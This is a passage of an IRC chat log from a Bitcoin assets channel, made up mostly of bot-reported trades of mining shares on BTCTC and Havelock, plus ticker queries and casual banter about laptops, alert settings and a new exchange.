2.9 BTC [+] Jun 18 16:57:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.029132 BTC [-] Jun 18 17:00:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.029132 = 0.1457 BTC [-] Jun 18 17:01:37 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [-] Jun 18 17:04:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006697 BTC [-] Jun 18 17:08:01 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.006697 = 0.0134 BTC [-] Jun 18 17:10:24 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.006697 = 0.2545 BTC [-] Jun 18 17:16:22 pankkake, that is useful! Jun 18 17:16:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02913 = 0.1165 BTC [-] Jun 18 17:17:25 where to get a good laptop without an OS? Jun 18 17:18:37 there's the Dell "Developer Edition" (with Ubuntu) Jun 18 17:21:41 cool, i'll look into it. thx pankkake Jun 18 17:28:39 [BTCTC] [DMS.MINING] 1 @ 0.019499 BTC [+] Jun 18 17:28:49 [BTCTC] [DMS.MINING] 20 @ 0.0195 = 0.39 BTC [+] Jun 18 17:28:52 [BTCTC] [DMS.MINING] 100 @ 0.0195 = 1.95 BTC [+] Jun 18 17:28:54 [BTCTC] [DMS.MINING] 37 @ 0.01975 = 0.7308 BTC [+] Jun 18 17:29:26 pankkake: does btcwarn allow you to set multiple notifications? I wanted to set one for 25% move, then one for 10% since last contact, but it says I'm already subscribed... Jun 18 17:30:22 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [-] Jun 18 17:31:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.02913 = 0.0583 BTC [-] Jun 18 17:32:15 well, if you have a 10% alert, you'll get it for 25 too, right? Jun 18 17:34:25 oh, but it's not the same, right. Jun 18 17:34:36 well you could trick it by adding a "+" after your e-mail Jun 18 17:35:15 i.e. user+1@host usually goes to user@host Jun 18 17:36:28 [BTCTC] [TAT.ASICMINER] 80 @ 0.0291 = 2.328 BTC [-] Jun 18 17:36:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [-] Jun 18 17:37:02 [HAVELOCK] [ASICM] 1 @ 0.029 BTC [+] Jun 18 17:38:44 [BTCTC] [DMS.MINING] 20 @ 0.0198 = 0.396 BTC [+] Jun 18 17:38:45 [BTCTC] [DMS.MINING] 1 @ 0.0198 BTC [+] Jun 18 17:38:47 [BTCTC] [DMS.MINING] 76 @ 0.019979 = 1.5184 BTC [+] Jun 18 17:41:12 [BTCTC] [ASICMINER-PT] 3 @ 2.875 = 8.625 BTC [-] Jun 18 17:42:20 ;;ticker Jun 18 17:42:21 BTCUSD ticker | Best bid: 111.50000, Best ask: 112.23419, Bid-ask spread: 0.73419, Last trade: 111.50000, 24 hour volume: 45753.74658198, 24 hour low: 100.00000, 24 hour high: 113.30000, 24 hour vwap: 106.56455 Jun 18 17:42:29 ;;bids 0 Jun 18 17:42:29 There are currently 23080316 bitcoins demanded at or over 0.0 USD, worth 14263766.4647 USD in total. | Data vintage: 119.4729 seconds Jun 18 17:42:36 [BTCTC] [DMS.SELLING] 20 @ 0.036501 = 0.73 BTC [-] Jun 18 17:42:36 ;;asks 11111111111111111111111 Jun 18 17:42:41 [BTCTC] [DMS.SELLING] 5 @ 0.0365 = 0.1825 BTC [-] Jun 18 17:42:42 There are currently 119722.24 bitcoins offered at or under 1.11111111111e+22 USD, worth 3.20153691713e+12 USD in total. | Data vintage: 0.0368 seconds Jun 18 17:44:02 [BTCTC] [DMS.PURCHASE] 250 @ 0.054609 = 13.6523 BTC [+] Jun 18 17:44:57 [BTCTC] [TAT.ASICMINER] 17 @ 0.029 = 0.493 BTC [-] Jun 18 17:46:40 [BTCTC] [TAT.ASICMINER] 3 @ 0.0289 = 0.0867 BTC [-] Jun 18 17:47:26 ;;ticker Jun 18 17:47:26 BTCUSD ticker | Best bid: 111.50000, Best ask: 112.23419, Bid-ask spread: 0.73419, Last trade: 111.50000, 24 hour volume: 46365.41762721, 24 hour low: 100.00000, 24 hour high: 113.30000, 24 hour vwap: 106.59654 Jun 18 17:47:43 [BTCTC] [ASICMINER-PT] 5 @ 2.875 = 14.375 BTC [-] Jun 18 17:47:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.028807 BTC [-] Jun 18 17:48:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006695 BTC [-] Jun 18 17:48:20 [BTCTC] [TAT.ASICMINER] 92 @ 0.028806 = 2.6502 BTC [-] Jun 18 17:48:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.0287 = 0.0861 BTC [-] Jun 18 17:49:22 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [+] Jun 18 17:49:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.02835 BTC [-] Jun 18 17:50:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.02835 BTC [-] Jun 18 17:50:38 [BTCTC] [ASICMINER-PT] 1 @ 2.899 BTC [+] Jun 18 17:54:43 [BTCTC] [DMS.MINING] 124 @ 0.01999 = 2.4788 BTC [+] Jun 18 17:55:22 [BTCTC] [DMS.MINING] 50 @ 0.02 = 1 BTC [+] Jun 18 17:55:24 [BTCTC] [DMS.MINING] 25 @ 0.02 = 0.5 BTC [+] Jun 18 17:55:26 [BTCTC] [DMS.MINING] 50 @ 0.02 = 1 BTC [+] Jun 18 17:55:26 [BTCTC] [DMS.MINING] 80 @ 0.02 = 1.6 BTC [+] Jun 18 18:02:07 [BTCTC] [DMS.MINING] 1 @ 0.020397 BTC [+] Jun 18 18:02:09 [BTCTC] [DMS.MINING] 4 @ 0.020397 = 0.0816 BTC [+] Jun 18 18:02:40 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.006695 = 0.0201 BTC [-] Jun 18 18:02:46 [BTCTC] [TAT.VIRTUALMINE] 27 @ 0.006695 = 0.1808 BTC [-] Jun 18 18:04:08 [BTCTC] [B.YABMC] 1 @ 0.013949 BTC [+] Jun 18 18:05:14 [BTCTC] [BASIC-MINING] 1 @ 0.67 BTC [-] Jun 18 18:06:09 [BTCTC] [ASICMINER-PT] 12 @ 2.875 = 34.5 BTC [-] Jun 18 18:06:34 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19299 BTC [-] Jun 18 18:06:35 [BTCTC] [ASICMINER-PT] 1 @ 2.871103 BTC [-] Jun 18 18:07:20 [BTCTC] [CRYPTO-TRADE] 5 @ 0.193001 = 0.965 BTC [+] Jun 18 18:07:21 [BTCTC] [ASICMINER-PT] 2 @ 2.8711 = 5.7422 BTC [-] Jun 18 18:08:05 [BTCTC] [ASICMINER-PT] 1 @ 2.870001 BTC [-] Jun 18 18:09:03 [BTCTC] [ASICMINER-PT] 2 @ 2.87 = 5.74 BTC [-] Jun 18 18:09:07 [BTCTC] [ASICMINER-PT] 1 @ 2.8626 BTC [-] Jun 18 18:09:10 [BTCTC] [ASICMINER-PT] 20 @ 2.85 = 57 BTC [-] Jun 18 18:09:32 ;;ticker Jun 18 18:09:32 BTCUSD ticker | Best bid: 109.18001, Best ask: 109.89998, Bid-ask spread: 0.71997, Last trade: 108.97002, 24 hour volume: 46905.34585578, 24 hour low: 100.00000, 24 hour high: 113.30000, 24 hour vwap: 106.63932 Jun 18 18:11:32 [BTCTC] [ASICMINER-PT] 2 @ 2.84 = 5.68 BTC [-] Jun 18 18:11:33 [BTCTC] [ASICMINER-PT] 1 @ 2.811001 BTC [-] Jun 18 18:11:39 [BTCTC] [ASICMINER-PT] 1 @ 2.811 BTC [-] Jun 18 18:11:41 [BTCTC] [ASICMINER-PT] 1 @ 2.800022 BTC [-] Jun 18 18:11:44 [BTCTC] [ASICMINER-PT] 1 @ 2.800021 BTC [-] Jun 18 18:11:46 [BTCTC] [ASICMINER-PT] 28 @ 2.800021 = 78.4006 BTC [-] Jun 18 18:11:51 [BTCTC] [ASICMINER-PT] 16 @ 2.80002 = 44.8003 BTC [-] Jun 18 18:12:43 http://coinjar.io/ Jun 18 18:13:12 oh snap Jun 18 18:13:15 we fillin jars Jun 18 18:13:41 http://coinjar.io/filler Jun 18 18:13:43 for ausfags Jun 18 18:14:14 "CoinJar Fair Rate™" makes me laugh though Jun 18 18:14:45 logo is almost cool Jun 18 18:15:04 Unbeatable fees. Jun 18 18:15:13 jee wheez, i had no idea aussies can spell that long Jun 18 18:15:23 that's like 10 letters! Jun 18 18:16:12 [BTCTC] [CRYPTO-TRADE] 1 @ 0.191 BTC [-] Jun 18 18:16:13 [BTCTC] [CRYPTO-TRADE] 10 @ 0.19 = 1.9 BTC [-] Jun 18 18:17:05 [BTCTC] [B.YABMC] 25 @ 0.011162 = 0.2791 BTC [-] Jun 18 18:17:31 [BTCTC] [B.YABMC] 25 @ 0.011162 = 0.2791 BTC [-] Jun 18 18:18:14 [BTCTC] [B.YABMC] 1 @ 0.01116 BTC [-] Jun 18 18:21:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.189 BTC [-] Jun 18 18:21:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.188 BTC [-] Jun 18 18:21:51 [BTCTC] [CRYPTO-TRADE] 1 @ 0.187 BTC [-] Jun 18 18:22:00 [BTCTC] [DMS.MINING] 5 @ 0.01801 = 0.0901 BTC [-] Jun 18 18:22:01 [BTCTC] [CRYPTO-TRADE] 5 @ 0.185 = 0.925 BTC [-] Jun 18 18:22:02 [BTCTC] [CRYPTO-TRADE] 7 @ 0.18 = 1.26 BTC [-] Jun 18 18:22:15 [BTCTC] [B.YABMC] 20 @ 0.01 = 0.2 BTC [-] Jun 18 18:22:28 [BTCTC] [ASICMINER-PT] 1 @ 2.802 BTC [+] Jun 18 18:22:30 [BTCTC] [ASICMINER-PT] 1 @ 2.801 BTC [-] Jun 18 18:22:31 [BTCTC] [ASICMINER-PT] 1 @ 2.800101 BTC [-] Jun 18 18:22:33 [BTCTC] [ASICMINER-PT] 3 @ 2.8001 = 8.4003 BTC [-] Jun 18 18:25:17 [BTCTC] [ASICMINER-PT] 1 @ 2.8002 BTC [+] Jun 18 18:25:18 [BTCTC] [ASICMINER-PT] 10 @ 2.80002 = 28.0002 BTC [-] Jun 18 18:25:20 [BTCTC] [ASICMINER-PT] 6 @ 2.8 = 16.8 BTC [-] Jun 18 18:25:22 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 18 18:26:47 [BTCTC] [DMS.PURCHASE] 25 @ 0.054609 = 1.3652 BTC [+] Jun 18 18:27:25 [HAVELOCK] [ASICM] 1 @ 0.02853703 BTC [-] Jun 18 18:27:27 [HAVELOCK] [ASICM] 5 @ 0.02853702 = 0.1427 BTC [-] Jun 18 18:27:28 [HAVELOCK] [ASICM] 7 @ 0.02853702 = 0.1998 BTC [-] Jun 18 18:27:29 [HAVELOCK] [ASICM] 216 @ 0.028537 = 6.164 BTC [-] Jun 18 18:27:30 [HAVELOCK] [ASICM] 8 @ 0.02851 = 0.2281 BTC [-] Jun 18 18:27:31 [HAVELOCK] [ASICM] 25 @ 0.02850001 = 0.7125 BTC [-] Jun 18 18:27:31 [HAVELOCK] [ASICM] 88 @ 0.0285 = 2.508 BTC [-] Jun 18 18:29:13 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 18 18:32:12 [HAVELOCK] [ASICM] 13 @ 0.0289 = 0.3757 BTC [+] Jun 18 18:35:23 [BTCTC] [DMS.MINING] 5 @ 0.018201 = 0.091 BTC [+] Jun 18 18:35:25 [BTCTC] [DMS.MINING] 25 @ 0.0182 = 0.455 BTC [-] Jun 18 18:36:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.028501 = 1.4251 BTC [+] Jun 18 18:36:44 [BTCTC] [TAT.ASICMINER] 30 @ 0.0285 = 0.855 BTC [-] Jun 18 18:37:23 pankkake: great idea! i forgot about that. Jun 18 18:40:09 [BTCTC] [TAT.ASICMINER] 16 @ 0.02835 = 0.4536 BTC [-] Jun 18 18:40:11 [BTCTC] [TAT.ASICMINER] 108 @ 0.02835 = 3.0618 BTC [-] Jun 18 18:40:13 [BTCTC] [TAT.ASICMINER] 131 @ 0.028322 = 3.7102 BTC [-] Jun 18 18:40:16 [BTCTC] [TAT.ASICMINER] 60 @ 0.028321 = 1.6993 BTC [-] Jun 18 18:40:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.028314 = 0.0566 BTC [-] Jun 18 18:40:25 [BTCTC] [TAT.ASICMINER] 45 @ 0.028311 = 1.274 BTC [-] Jun 18 18:40:29 [BTCTC] [TAT.ASICMINER] 80 @ 0.028289 = 2.2631 BTC [-] Jun 18 18:40:30 [BTCTC] [TAT.ASICMINER] 40 @ 0.02813 = 1.1252 BTC [-] Jun 18 18:40:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.02811 = 0.5622 BTC [-] Jun 18 18:40:43 [BTCTC] [DMS.MINING] 129 @ 0.0184 = 2.3736 BTC [+] Jun 18 18:40:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.028109 = 0.2811 BTC [-] Jun 18 18:40:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.028011 BTC [-] Jun 18 18:41:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.028 = 0.28 BTC [-] Jun 18 18:41:06 [BTCTC] [TAT.ASICMINER] 22 @ 0.028 = 0.616 BTC [-] Jun 18 18:41:11 [BTCTC] [DMS.SELLING] 81 @ 0.033311 = 2.6982 BTC [-] Jun 18 18:41:12 [BTCTC] [TAT.ASICMINER] 2 @ 0.028 = 0.056 BTC [-] Jun 18 18:41:14 [BTCTC] [DMS.SELLING] 55 @ 0.03331 = 1.8321 BTC [-] Jun 18 18:41:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.028 = 0.14 BTC [-] Jun 18 18:41:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.028 = 0.112 BTC [-] Jun 18 18:41:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.028 = 0.168 BTC [-] Jun 18 18:41:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.027801 = 0.0834 BTC [-] Jun 18 18:41:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.0277 = 0.277 BTC [-] Jun 18 18:41:38 [BTCTC] [TAT.ASICMINER] 7 @ 0.0277 = 0.1939 BTC [-] Jun 18 18:41:40 [BTCTC] [TAT.ASICMINER] 61 @ 0.02769 = 1.6891 BTC [-] Jun 18 18:41:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.027662 = 1.3831 BTC [-] Jun 18 18:41:48 [BTCTC] [TAT.ASICMINER] 150 @ 0.02766 = 4.149 BTC [-] Jun 18 18:42:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0275 BTC [-] Jun 18 18:42:16 [BTCTC] [TAT.ASICMINER] 10 @ 0.0275 = 0.275 BTC [-] Jun 18 18:42:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.0275 = 0.275 BTC [-] Jun 18 18:42:20 [BTCTC] [TAT.ASICMINER] 15 @ 0.0273 = 0.4095 BTC [-] Jun 18 18:42:30 [BTCTC] [TAT.ASICMINER] 2 @ 0.0273 = 0.0546 BTC [-] Jun 18 18:42:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.027213 = 0.0816 BTC [-] Jun 18 18:42:33 [BTCTC] [TAT.ASICMINER] 18 @ 0.027212 = 0.4898 BTC [-] Jun 18 18:42:35 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0065 = 0.013 BTC [-] Jun 18 18:42:36 [BTCTC] [TAT.ASICMINER] 6 @ 0.027 = 0.162 BTC [-] Jun 18 18:42:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 18 18:42:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.027 = 0.108 BTC [-] Jun 18 18:42:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 18 18:43:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.0269 = 0.0538 BTC [-] Jun 18 18:43:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.02681 BTC [-] Jun 18 18:43:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.0268 = 0.0804 BTC [-] Jun 18 18:43:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.0267 = 0.1335 BTC [-] Jun 18 18:43:16 [BTCTC] [TAT.ASICMINER] 7 @ 0.0266 = 0.1862 BTC [-] Jun 18 18:43:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.02655 = 1.3275 BTC [-] Jun 18 18:43:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.0265 = 0.265 BTC [-] Jun 18 18:43:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.0265 = 0.2385 BTC [-] Jun 18 18:43:23 [BTCTC] [TAT.ASICMINER] 11 @ 0.0264 = 0.2904 BTC [-] Jun 18 18:43:25 [BTCTC] [TAT.ASICMINER] 14 @ 0.0263 = 0.3682 BTC [-] Jun 18 18:43:26 [BTCTC] [TAT.ASICMINER] 30 @ 0.026201 = 0.786 BTC [-] Jun 18 18:43:34 [HAVELOCK] [ASICM] 1 @ 0.028899 BTC [-] Jun 18 18:43:40 [BTCTC] [TAT.ASICMINER] 16 @ 0.026 = 0.416 BTC [-] Jun 18 18:43:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.026 = 0.26 BTC [-] Jun 18 18:44:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.0256 = 0.256 BTC [-] Jun 18 18:44:19 [BTCTC] [TAT.ASICMINER] 50 @ 0.025271 = 1.2636 BTC [-] Jun 18 18:44:23 [BTCTC] [TAT.ASICMINER] 2 @ 0.02521 = 0.0504 BTC [-] Jun 18 18:44:24 [BTCTC] [TAT.ASICMINER] 19 @ 0.02521 = 0.479 BTC [-] Jun 18 18:44:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.02521 = 0.2773 BTC [-] Jun 18 18:44:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.0252 = 0.1008 BTC [-] Jun 18 18:44:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.025151 = 0.0755 BTC [-] Jun 18 18:44:37 [BTCTC] [TAT.ASICMINER] 25 @ 0.02515 = 0.6288 BTC [-] Jun 18 18:44:37 yeesh Jun 18 18:44:38 [BTCTC] [TAT.ASICMINER] 68 @ 0.025121 = 1.7082 BTC [-] Jun 18 18:44:44 cant even get a bid in Jun 18 18:45:20 [BTCTC] [ASICMINER-PT] 2 @ 2.8 = 5.6 BTC [-] Jun 18 18:45:27 [BTCTC] [ASICMINER-PT] 1 @ 2.790234 BTC [-] Jun 18 18:45:32 [BTCTC] [ASICMINER-PT] 2 @ 2.7901 = 5.5802 BTC [-] Jun 18 18:48:12 [BTCTC] [ASICMINER-PT] 5 @ 2.8 = 14 BTC [+] Jun 18 18:54:14 [BTCTC] [DMS.MINING] 15 @ 0.0188 = 0.282 BTC [+] Jun 18 18:55:46 [BTCTC] [DMS.MINING] 10 @ 0.020286 = 0.2029 BTC [+] Jun 18 18:55:48 [BTCTC] [DMS.MINING] 10 @ 0.020287 = 0.2029 BTC [+] Jun 18 18:58:27 [HAVELOCK] [ASICM] 2 @ 0.02889899 = 0.0578 BTC [-] Jun 18 19:01:15 [BTCTC] [ASICMINER-PT] 1 @ 2.867999 BTC [+] Jun 18 19:01:25 [BTCTC] [ASICMINER-PT] 1 @ 2.868 BTC [+] Jun 18 19:04:45 [BTCTC] [DMS.MINING] 20 @ 0.019091 = 0.3818 BTC [-] Jun 18 19:05:08 [BTCTC] [DMS.MINING] 13 @ 0.01909 = 0.2482 BTC [-] Jun 18 19:05:59 [BTCTC] [DMS.MINING] 10 @ 0.019 = 0.19 BTC [-] Jun 18 19:07:22 [BTCTC] [BTC-BOND] 10 @ 0.009996 = 0.1 BTC [+] Jun 18 19:07:23 [BTCTC] [BTC-BOND] 5 @ 0.009996 = 0.05 BTC [+] Jun 18 19:07:25 [BTCTC] [BTC-BOND] 5 @ 0.009997 = 0.05 BTC [+] Jun 18 19:09:29 [BTCTC] [DMS.PURCHASE] 200 @ 0.054589 = 10.9178 BTC [-] Jun 18 19:10:17 [BTCTC] [DMS.PURCHASE] 18 @ 0.054589 = 0.9826 BTC [-] Jun 18 19:10:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.028996 = 0.087 BTC [+] Jun 18 19:11:17 [BTCTC] [TAT.ASICMINER] 50 @ 0.0288 = 1.44 BTC [-] Jun 18 19:11:17 [BTCTC] [ASICMINER-PT] 2 @ 2.875 = 5.75 BTC [+] Jun 18 19:13:05 [BTCTC] [RSM] 10 @ 0.01618 = 0.1618 BTC [-] Jun 18 19:13:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [+] Jun 18 19:14:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0065 BTC [-] Jun 18 19:15:10 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [+] Jun 18 19:15:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [+] Jun 18 19:17:57 [BTCTC] [DMS.MINING] 2 @ 0.02 = 0.04 BTC [+] Jun 18 19:19:53 [BTCTC] [DMS.MINING] 1 @ 0.019999 BTC [-] Jun 18 19:21:29 ;;seen mircea_popescu Jun 18 19:21:29 mircea_popescu was last seen in #bitcoin-assets 1 hour, 6 minutes, and 5 seconds ago: that's like 10 letters! Jun 18 19:22:14 mircea_popescu: you still around? Jun 18 19:22:56 yea Jun 18 19:26:14 [BTCTC] [TAT.ASICMINER] 28 @ 0.0281 = 0.7868 BTC [-] Jun 18 19:29:26 Why is he called assbot… Jun 18 19:30:40 Why is he called Plazmotech? Jun 18 19:32:02 [BTCTC] [ASICMINER-PT] 1 @ 2.8769 BTC [+] Jun 18 19:32:39 Oh my god it speaks Jun 18 19:33:26 lmao Jun 18 19:33:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0282 BTC [+] Jun 18 19:33:30 [BTCTC] [TAT.ASICMINER] 172 @ 0.0281 = 4.8332 BTC [-] Jun 18 19:33:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.028 = 0.056 BTC [-] Jun 18 19:33:33 [BTCTC] [TAT.ASICMINER] 9 @ 0.0268 = 0.2412 BTC [-] Jun 18 19:33:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.026711 = 0.0534 BTC [-] Jun 18 19:33:35 [BTCTC] [TAT.ASICMINER] 70 @ 0.0265 = 1.855 BTC [-] Jun 18 19:33:38 [BTCTC] [TAT.ASICMINER] 13 @ 0.0264 = 0.3432 BTC [-] Jun 18 19:33:45 [BTCTC] [TAT.ASICMINER] 30 @ 0.026302 = 0.7891 BTC [-] Jun 18 19:33:46 [BTCTC] [TAT.ASICMINER] 4 @ 0.026301 = 0.1052 BTC [-] Jun 18 19:33:48 [BTCTC] [TAT.ASICMINER] 25 @ 0.026275 = 0.6569 BTC [-] Jun 18 19:33:50 [BTCTC] [TAT.ASICMINER] 176 @ 0.026261 = 4.6219 BTC [-] Jun 18 19:33:54 wait, wasn't this supposed to be like 3 something ? Jun 18 19:34:06 this is TAT.ASICMINER Jun 18 19:34:14 if that's what you're talking about Jun 18 19:34:27 yea Jun 18 19:35:19 Wow I accidentally just bought another TAT.ASICMINER share, oops Jun 18 19:35:57 https://bitcointalk.org/index.php?topic=135163.msg1440181#msg1440181 Jun 18 19:35:59 lmao that's rich Jun 18 19:36:12 [BTCTC] [BTC-BOND] 30 @ 0.00985 = 0.2955 BTC [-] Jun 18 19:36:42 Wow, another person who says "That's rich" Jun 18 19:36:48 I thought I was the only one Jun 18 19:38:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.02899 = 0.2899 BTC [+] Jun 18 19:38:33 well, i actually am rich, so. Jun 18 19:38:44 [BTCTC] [DMS.MINING] 16 @ 0.02 = 0.32 BTC [+] Jun 18 19:39:21 [BTCTC] [DMS.SELLING] 4 @ 0.03335 = 0.1334 BTC [+] Jun 18 19:40:30 [BTCTC] [DMS.MINING] 10 @ 0.02 = 0.2 BTC [+] Jun 18 19:41:07 [BTCTC] [DMS.SELLING] 5 @ 0.03335 = 0.1668 BTC [+] Jun 18 19:41:19 [HAVELOCK] [ASICM] 147 @ 0.0288 = 4.2336 BTC [-] Jun 18 19:41:29 [BTCTC] [DMS.MINING] 114 @ 0.02 = 2.28 BTC [+] Jun 18 19:41:43 [BTCTC] [BITVPS] 40 @ 0.000722 = 0.0289 BTC [+] Jun 18 19:41:44 [BTCTC] [BITVPS] 6 @ 0.000722 = 0.0043 BTC [+] Jun 18 19:41:46 [BTCTC] [BITVPS] 1 @ 0.000723 BTC [+] Jun 18 19:41:47 [BTCTC] [BITVPS] 94 @ 0.000723 = 0.068 BTC [+] Jun 18 19:41:48 [BTCTC] [BITVPS] 87 @ 0.000724 = 0.063 BTC [+] Jun 18 19:41:49 [BTCTC] [BITVPS] 100 @ 0.000724 = 0.0724 BTC [+] Jun 18 19:41:55 I'm not rich Jun 18 19:42:35 Well, I do have a _whole_ 0.05339266 BTC in my wallet :) Jun 18 19:42:51 [BTCTC] [DMS.PURCHASE] 7 @ 0.054589 = 0.3821 BTC [-] Jun 18 19:43:26 1 DMS.PURCHASE stock is more than my entire bitcoin balance Jun 18 19:43:57 [BTCTC] [DMS.MINING] 100 @ 0.02 = 2 BTC [+] Jun 18 19:44:13 I wish CampBX didn't have a 31 day waiting period. It's absurd. Here I am, waiting and waiting. Stocks just wanting to be bought Jun 18 19:44:15 [BTCTC] [DMS.MINING] 60 @ 0.02 = 1.2 BTC [+] Jun 18 19:45:42 [BTCTC] [DMS.PURCHASE] 130 @ 0.054589 = 7.0966 BTC [-] Jun 18 19:45:45 [BTCTC] [DMS.MINING] 149 @ 0.02027 = 3.0202 BTC [+] Jun 18 19:46:20 [BTCTC] [DMS.PURCHASE] 60 @ 0.054589 = 3.2753 BTC [-] Jun 18 19:50:36 Plazmotech https://bitcointalk.org/index.php?topic=234398.msg2503322#msg2503322 Jun 18 19:50:42 that guy just received .13 btc Jun 18 19:50:44 can you draw ? Jun 18 19:51:27 [BTCTC] [DMS.MINING] 2 @ 0.01999 = 0.04 BTC [-] Jun 18 19:51:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006022 BTC [-] Jun 18 19:54:16 Excuse me? Jun 18 19:54:37 Oh no. I suck at drawing Jun 18 19:54:45 What? Jun 18 19:54:55 I do program Python tho… That's pretty much the only skill I have Jun 18 19:55:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.0281 = 0.7025 BTC [-] Jun 18 19:55:32 ya well. Jun 18 19:55:35 31 day waiting perod for an account on campbx ? Jun 18 19:55:46 [BTCTC] [DMS.MINING] 5 @ 0.0195 = 0.0975 BTC [-] Jun 18 19:56:12 for real? Jun 18 19:56:22 or is that for uber-trust verification? Jun 18 19:56:48 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 18 19:57:00 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 18 19:57:16 [BTCTC] [ASICMINER-PT] 5 @ 2.85 = 14.25 BTC [-] Jun 18 19:57:32 [BTCTC] [TAT.ASICMINER] 40 @ 0.028899 = 1.156 BTC [+] Jun 18 20:03:38 yo Jun 18 20:03:48 tis me again Jun 18 20:12:26 [HAVELOCK] [ASICM] 3 @ 0.02879999 = 0.0864 BTC [-] Jun 18 20:12:28 [HAVELOCK] [ASICM] 156 @ 0.0288 = 4.4928 BTC [+] Jun 18 20:14:45 [BTCTC] [DMS.MINING] 1 @ 0.019988 BTC [+] Jun 18 20:18:26 [HAVELOCK] [ASICM] 497 @ 0.0288 = 14.3136 BTC [+] Jun 18 20:18:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0066 BTC [+] Jun 18 20:18:51 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006693 = 0.0669 BTC [+] Jun 18 20:18:53 [HAVELOCK] [SDICE] 18 @ 0.2098999 = 3.7782 BTC [-] Jun 18 20:19:01 [HAVELOCK] [SDICE] 7 @ 0.2099 = 1.4693 BTC [+] Jun 18 20:19:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006693 BTC [+] Jun 18 20:23:39 [HAVELOCK] [ASICM] 300 @ 0.0288999 = 8.67 BTC [+] Jun 18 20:24:09 [BTCTC] [BITVPS] 2 @ 0.000725 = 0.0015 BTC [+] Jun 18 20:24:47 [BTCTC] [ASICMINER-PT] 1 @ 2.87699 BTC [+] Jun 18 20:25:08 [HAVELOCK] [ASICM] 40 @ 0.0288999 = 1.156 BTC [+] Jun 18 20:29:07 [BTCTC] [TAT.ASICMINER] 10 @ 0.028101 = 0.281 BTC [-] Jun 18 20:30:23 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 18 20:30:57 [HAVELOCK] [ASICM] 16 @ 0.02889 = 0.4622 BTC [-] Jun 18 20:31:39 [BTCTC] [TAT.ASICMINER] 30 @ 0.028101 = 0.843 BTC [-] Jun 18 20:32:20 [BTCTC] [DMS.PURCHASE] 6 @ 0.054589 = 0.3275 BTC [-] Jun 18 20:32:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.028899 = 0.289 BTC [+] Jun 18 20:32:43 [BTCTC] [DMS.MINING] 1 @ 0.019988 BTC [+] Jun 18 20:33:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.0289 = 0.2023 BTC [+] Jun 18 20:42:52 [BTCTC] [TAT.ASICMINER] 10 @ 0.028899 = 0.289 BTC [-] Jun 18 20:43:43 [BTCTC] [TAT.ASICMINER] 10 @ 0.0289 = 0.289 BTC [+] Jun 18 20:44:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.0289 